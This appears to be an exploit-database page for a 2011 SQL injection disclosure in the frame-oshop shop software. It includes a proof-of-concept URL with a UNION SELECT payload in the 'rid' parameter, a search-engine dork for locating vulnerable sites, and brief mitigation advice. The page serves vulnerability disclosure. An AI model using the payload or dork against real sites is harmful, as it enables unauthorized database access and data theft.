header-logo
Suggest Exploit
vendor:
frame-oshop
by:
-SmoG-
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: frame-oshop
Affected Version From: i dunno...
Affected Version To: i dunno...
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

frame-oshop 0day

frame-oshop is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious payload to the vulnerable application. The malicious payload can be sent as a parameter in the URL. The payload can be used to extract sensitive information from the database.

Mitigation:

Input validation should be done to prevent SQL Injection attacks. Sanitizing user input is also recommended.
Source

Exploit-DB raw data:

product:	frame-oshop
vendor:		http://www.sdaxx.de/
date:		15.05.2011
status:		0day
version:	i dunno...

PoC: http://www.host.com/shop/main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12

Dork: 		"2006 by Sdaxx Rostock" intitle:"frame-oshop"

Note:		-sessid had to be fresh
		-there are more vuln...

>>published by -SmoG- on SceneGround.info<<


gretz to my mentor Therion, c0x and other sg-members!

Navigation

Suggest Exploit

Services By CQR